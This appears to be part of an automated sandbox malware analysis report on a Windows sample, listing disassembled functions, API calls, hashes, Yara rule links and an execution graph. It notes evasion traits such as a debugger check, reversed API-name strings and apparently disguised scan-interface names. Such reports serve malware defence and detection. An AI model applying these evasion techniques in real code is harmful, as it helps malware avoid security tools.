                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                        • API String ID: 3677997916-4173385793
                                                                                        • Opcode ID: 185313a2c37615418dd9b1b71fcf990e89bdea35448d8404ca01ab8ace3adf16
                                                                                        • Instruction ID: c27e3796698de86e194699b31592330d8ac58edca0a380a351e7b5e6ccedf919
                                                                                        • Opcode Fuzzy Hash: 185313a2c37615418dd9b1b71fcf990e89bdea35448d8404ca01ab8ace3adf16
                                                                                        • Instruction Fuzzy Hash: 6E01D8B9A44318BAFB11DFD0CD02BBE77FCD708B00F5045A5BA04D6680E675A510CF69
                                                                                        Function 027E8140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                        • API String ID: 667068680-1372893251
                                                                                        • Opcode ID: 2844e513c1ec104cc2265e8769cc04537e5b78e3c2db960656d5d180cfc9a287
                                                                                        • Instruction ID: fd39fc0b52149a55f8493ece1f93bff8fb07196b4e6632310311ddaaf63991aa
                                                                                        • Opcode Fuzzy Hash: 2844e513c1ec104cc2265e8769cc04537e5b78e3c2db960656d5d180cfc9a287
                                                                                        • Instruction Fuzzy Hash: 0901A278A00304AFEB11EBA4E959F5EBBFEEB4C710F528464F401D7650E670A9048A29
                                                                                        Function 027DAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,027DAAE7,?,?,00000000), ref: 027DAA68
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027DAAE7,?,?,00000000), ref: 027DAA98
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 027DAAA3
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027DAAE7,?,?,00000000), ref: 027DAAC1
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 027DAACC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                        • String ID:
                                                                                        • API String ID: 4102113445-0
                                                                                        • Opcode ID: 3e3ebf1b5b2565c7f2de934d6fcdc958768450a4fec57db1aceb26aef737e290
                                                                                        • Instruction ID: 1277ce96d7cde28e03fb2ac13cd69d9b80c524979933b44ff7f3e03187582979
                                                                                        • Opcode Fuzzy Hash: 3e3ebf1b5b2565c7f2de934d6fcdc958768450a4fec57db1aceb26aef737e290
                                                                                        • Instruction Fuzzy Hash: 3501A2B93006446FFB13BA64DE15F6A7B7DEB86720F510660F500E66C0E7759E008A69
                                                                                        Function 027DAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,027DACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027DAB2F
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: eeee$ggg$yyyy
                                                                                        • API String ID: 4232894706-1253427255
                                                                                        • Opcode ID: d42fc47b40e6f462fd094d4f62fd8d5bbe5d65660105b81fa72c9e86ee2d9fa2
                                                                                        • Instruction ID: 2de360123cb5602814f48616c42eb96fd8fcc4efdef941c032edfbbbe998c3d3
                                                                                        • Opcode Fuzzy Hash: d42fc47b40e6f462fd094d4f62fd8d5bbe5d65660105b81fa72c9e86ee2d9fa2
                                                                                        • Instruction Fuzzy Hash: 5C4123717042054BDB13EB78C9A86BEB7FBFF81220B554921D48AD3344EB34EE02CA25
                                                                                        Function 027E8098 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc
                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                        • API String ID: 1883125708-1952140341
                                                                                        • Opcode ID: a5adfeb4742629147d57f7499e6ff50c61e0dd019a338d26936c95f6f069e43d
                                                                                        • Instruction ID: 5dcdcf7fdd8ffc6f036872a8f3bf609731811b01a9d0f1a0faf840b35b040c00
                                                                                        • Opcode Fuzzy Hash: a5adfeb4742629147d57f7499e6ff50c61e0dd019a338d26936c95f6f069e43d
                                                                                        • Instruction Fuzzy Hash: D6F0F078600308AFEB02EFA0DD5AA2ABBEDFB0DB04B524464F402D3660D770AD008A35
                                                                                        Function 027EF9DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,027EFDE0,UacInitialize,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString), ref: 027EF9E2
                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027EF9F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                        • API String ID: 1646373207-2367923768
                                                                                        • Opcode ID: da56a962c13dbaa468dac8671789dcc0fb3aa0f4b3a5c334a77f85d1492558f6
                                                                                        • Instruction ID: b718575c31dd4683f323e014962bfa162dbec2dd4558f7afd2e8938002889d10
                                                                                        • Opcode Fuzzy Hash: da56a962c13dbaa468dac8671789dcc0fb3aa0f4b3a5c334a77f85d1492558f6
                                                                                        • Instruction Fuzzy Hash: D0D012E63603801EFE00B2F42CC881D038CC91E92E3200E62F027DA8A2F6A68811502A
                                                                                        Function 027DC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,027FD10B,00000000,027FD11E), ref: 027DC47A
                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027DC48B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: 60c5508f0ac7860d5648adf5f4b6ae2b59ecffe4574cad7e819eca82ce4b674e
                                                                                        • Instruction ID: fa4be13551dce5d95d75014b54820c2170e3d9fc75dada844b2c893d9a7de70d
                                                                                        • Opcode Fuzzy Hash: 60c5508f0ac7860d5648adf5f4b6ae2b59ecffe4574cad7e819eca82ce4b674e
                                                                                        • Instruction Fuzzy Hash: C0D05EE0A443045BEA42BAB1A5856312FB88308314B04986FE50186110E7726410CF15
                                                                                        Function 027DE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DE297
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DE2B3
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DE32A
                                                                                        • VariantClear.OLEAUT32(?), ref: 027DE353
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                        • String ID:
                                                                                        • API String ID: 920484758-0
                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction ID: 69a9c782a50049b450c638060455831e719d60c0dda772e847a290a54296c443
                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction Fuzzy Hash: B7410875A016299FCB63DF58CD94BDAB3BDAF49314F4042D5E648AB211DA30AF80CF60
                                                                                        Function 027DAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 1583ebec2a28562c5ed6cc76fe25e5756477f5ea1240ec16dfdccab7ffbbb413
                                                                                        • Instruction ID: ff6491842e4d0800642674599ed5f564fb04a1a99d43936b249b24c360195cce
                                                                                        • Opcode Fuzzy Hash: 1583ebec2a28562c5ed6cc76fe25e5756477f5ea1240ec16dfdccab7ffbbb413
                                                                                        • Instruction Fuzzy Hash: 20414C74A402589FDB22EB68DC89BDAB7FDAB08300F4440E6A548E7345DB70AF84CF55
                                                                                        Function 027DAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 2e9e37f8d1e81b85bb5100cb850d499f8fb9e5ee5f19480b32315613965c3f51
                                                                                        • Instruction ID: fafafe1da7e4b337dc376cc2d285a00e054974824d0c3725fd033aa7a848131a
                                                                                        • Opcode Fuzzy Hash: 2e9e37f8d1e81b85bb5100cb850d499f8fb9e5ee5f19480b32315613965c3f51
                                                                                        • Instruction Fuzzy Hash: 59415E74A402589FDB22EB68DC89BDAB7FDAB08301F4440E5A548E7341DB70AF84CF55
                                                                                        Function 027D1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3b093ab615414098555e635550d71d4c3293ab06616ee3066752053bcf49da1
                                                                                        • Instruction ID: eeb904e4a6791b17692331308958b45ad94dacb2d1ae236f62176580b2994bf3
                                                                                        • Opcode Fuzzy Hash: f3b093ab615414098555e635550d71d4c3293ab06616ee3066752053bcf49da1
                                                                                        • Instruction Fuzzy Hash: C0A128667116000BD719AA7DAD843BDB3E2DBC5325F98827EE11DCB3C2EB68C9458750
                                                                                        Function 027D94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027D95DA), ref: 027D9572
                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027D95DA), ref: 027D9578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: DateFormatLocaleThread
                                                                                        • String ID: yyyy
                                                                                        • API String ID: 3303714858-3145165042
                                                                                        • Opcode ID: df39e05453dddfdb088f138b2fad87a78d078675b9a85604adbc7d0ab86915fa
                                                                                        • Instruction ID: 1a767954d08a3eb2f53a31144c9e53425e1c10eb6a2c54dec63f5039474ed42d
                                                                                        • Opcode Fuzzy Hash: df39e05453dddfdb088f138b2fad87a78d078675b9a85604adbc7d0ab86915fa
                                                                                        • Instruction Fuzzy Hash: 78218175A00268DFDB11DFA8C995AAEB7B9EF09710F5100B5E946E7280D730DE40CF65
                                                                                        Function 027E8204 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027E828E), ref: 027E8270
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                        • API String ID: 3811539418-184458249
                                                                                        • Opcode ID: f8d44f5fa550c809a2c829b0784f0d2d20260cd265cbbc301be15e3a4c87e296
                                                                                        • Instruction ID: 289ad154bccdfd716e846a573d6ea02b87e7afa4d662805d8ffb44e3292efd05
                                                                                        • Opcode Fuzzy Hash: f8d44f5fa550c809a2c829b0784f0d2d20260cd265cbbc301be15e3a4c87e296
                                                                                        • Instruction Fuzzy Hash: 7A01A979640708BFEB12EFA8DD1AF5A77FEEB4CB10F518420B601D6250D630AD148A36
                                                                                        Function 027EADDC Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAE10
                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 027EAE40
                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 027EAE5F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAE6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Read$Write
                                                                                        • String ID:
                                                                                        • API String ID: 3448952669-0
                                                                                        • Opcode ID: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
                                                                                        • Instruction ID: f03c3d0a7acb7d50050832f2678eeaefc92fb1196315a73bc13d09e4be3607a4
                                                                                        • Opcode Fuzzy Hash: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
                                                                                        • Instruction Fuzzy Hash: FE21E17064021A9BCF10EF29DC85BAE77AAEF88720F008111ED5597380D734ED118AA0

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.7%
                                                                                        Dynamic/Decrypted Code Coverage:50.1%
                                                                                        Signature Coverage:17.2%
                                                                                        Total number of Nodes:343
                                                                                        Total number of Limit Nodes:41
                                                                                        execution_graph 45384 210149e0 45385 21014a26 GetCurrentProcess 45384->45385 45387 21014a71 45385->45387 45388 21014a78 GetCurrentThread 45385->45388 45387->45388 45389 21014ab5 GetCurrentProcess 45388->45389 45390 21014aae 45388->45390 45391 21014aeb 45389->45391 45390->45389 45392 21014b13 GetCurrentThreadId 45391->45392 45393 21014b44 45392->45393 45320 1cf6d030 45321 1cf6d048 45320->45321 45322 1cf6d0a2 45321->45322 45325 21170585 45321->45325 45331 21170588 45321->45331 45326 211705b5 45325->45326 45327 211705e7 45326->45327 45337 21170be4 45326->45337 45343 21170b08 45326->45343 45348 21170b18 45326->45348 45332 211705b5 45331->45332 45333 211705e7 45332->45333 45334 21170be4 2 API calls 45332->45334 45335 21170b18 2 API calls 45332->45335 45336 21170b08 2 API calls 45332->45336 45333->45333 45334->45333 45335->45333 45336->45333 45338 21170ba2 45337->45338 45339 21170bf2 45337->45339 45353 21170bd0 45338->45353 45356 21170bc0 45338->45356 45340 21170bb8 45340->45327 45344 21170b2c 45343->45344 45346 21170bd0 2 API calls 45344->45346 45347 21170bc0 2 API calls 45344->45347 45345 21170bb8 45345->45327 45346->45345 45347->45345 45350 21170b2c 45348->45350 45349 21170bb8 45349->45327 45351 21170bd0 2 API calls 45350->45351 45352 21170bc0 2 API calls 45350->45352 45351->45349 45352->45349 45354 21170be1 45353->45354 45360 21171d9c 45353->45360 45354->45340 45357 21170bd0 45356->45357 45358 21170be1 45357->45358 45359 21171d9c 2 API calls 45357->45359 45358->45340 45359->45358 45364 21171db0 45360->45364 45368 21171dc0 45360->45368 45361 21171daa 45361->45354 45365 21171e02 45364->45365 45367 21171e09 45364->45367 45366 21171e5a CallWindowProcW 45365->45366 45365->45367 45366->45367 45367->45361 45369 21171e02 45368->45369 45371 21171e09 45368->45371 45370 21171e5a CallWindowProcW 45369->45370 45369->45371 45370->45371 45371->45361 45394 2019d830 45396 2019d85b 45394->45396 45395 2019d94a 45396->45395 45398 2019d2e8 45396->45398 45399 2019e348 CreateProcessW 45398->45399 45401 2019e609 45399->45401 45402 21014c28 DuplicateHandle 45403 21014d05 45402->45403 45404 20199fb0 45405 20199fbc 45404->45405 45406 20199ff9 45405->45406 45409 21013cd8 45405->45409 45413 21013cc8 45405->45413 45410 